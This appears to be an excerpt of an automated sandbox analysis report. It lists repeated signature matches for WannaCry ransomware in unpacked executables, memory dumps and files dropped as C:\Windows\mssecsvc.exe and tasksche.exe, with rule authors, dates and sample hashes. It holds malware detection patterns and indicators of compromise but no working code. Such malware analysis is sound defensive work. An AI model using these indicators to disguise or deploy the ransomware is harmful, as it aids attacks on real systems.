Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000000.383003497.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000013.00000000.463303050.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000000.384240153.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.388277654.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.392238630.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.386126124.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000000.385681867.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: mssecsvc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: HFKDS6VcNO.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                Source: HFKDS6VcNO.dll, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: HFKDS6VcNO.dll, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
